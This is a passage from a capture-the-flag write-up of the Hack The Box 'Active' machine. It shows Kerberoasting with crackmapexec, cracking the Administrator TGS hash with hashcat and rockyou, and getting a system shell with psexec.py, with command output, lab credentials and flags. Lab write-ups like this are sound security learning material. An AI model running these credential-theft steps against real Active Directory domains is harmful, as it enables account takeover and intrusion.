cat Desktop/user.txt
7d36c018659d1242bd474c297d965bdf

After getting the user flag I hit a wall. Going through every file under Users didn't help either, since they are all default files, so I had to peek at other people's writeups, and only then noticed I had completely forgotten there was still something I hadn't looked at!

Kerberoasting - Port 88

Never underestimate the power of ignorance: completely overlooking Kerberos, a core part of AD, is what it gets you. I had to start by reading up, and that is how I learned about the Kerberoast technique. In short, Kerberoast abuses the Kerberos mechanism to obtain a Ticket Granting Service (TGS) ticket and then brute-forces offline the service account password that encrypts it.

For details, see my other note: [Kerberoast: abusing the mechanism and brute-forcing](/zh-tw/Credential-Access/kerberoast).

Remember to add the DC's domain name to /etc/hosts

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ cat /etc/hosts     
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.129.122.239   active.htb dc.active.htb

Obtaining the TGS hash

Kerberoasting with CrackMapExec. You can also first run an LDAP search to confirm whether any accounts have a servicePrincipalName, and then request their TGS.

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ crackmapexec ldap 10.129.122.239 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --kerberoasting output.txt
SMB         10.129.122.239   445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
LDAP        10.129.122.239   389    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
LDAP        10.129.122.239   389    DC               [*] Total of records returned 1
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP        10.129.122.239   389    DC               sAMAccountName: Administrator memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb pwdLastSet: 2018-07-18 14:06:40.351723 lastLogon:2023-06-01 01:29:13.530504
LDAP        10.129.122.239   389    DC               $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae62951b4c98375f7aaad3fad9a$...

Brute-forcing the TGS hash

Brute-force the hash with hashcat and a wordlist.

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat --example-hashes | grep krb5tgs -B 11
Hash mode #13100
  Name................: Kerberos 5, etype 23, TGS-REP
  Category............: Network Protocol
  Slow.Hash...........: No
  Password.Len.Min....: 0
  Password.Len.Max....: 256
  Salt.Type...........: Embedded
  Salt.Len.Min........: 0
  Salt.Len.Max........: 256
  Kernel.Type(s)......: pure, optimized
  Example.Hash.Format.: plain
  Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
...                                                                                          
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt.gz 
hashcat (v6.2.6) starting
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae...ed9130e8:Ticketmaster1968
...

I don't know why winrm showed up in the first Nmap scan, but it doesn't matter: you can fetch root.txt over SMB the same way as the user flag earlier, or use psexec.py to get a CMD shell.

┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ psexec.py active.htb/Administrator:Ticketmaster1968@10.129.122.239
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.122.239.....
[*] Found writable share ADMIN$
[*] Uploading file ouTWePBG.exe
[*] Opening SVCManager on 10.129.122.239.....
[*] Creating service gQQp on 10.129.122.239.....
[*] Starting service gQQp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd \

C:\> cd users/administrator/desktop

C:\Users\Administrator\Desktop> type root.txt
8b074aa02cd800724b6bd39e595974a7

Last update: 2024-12-23 Created: 2023-05-24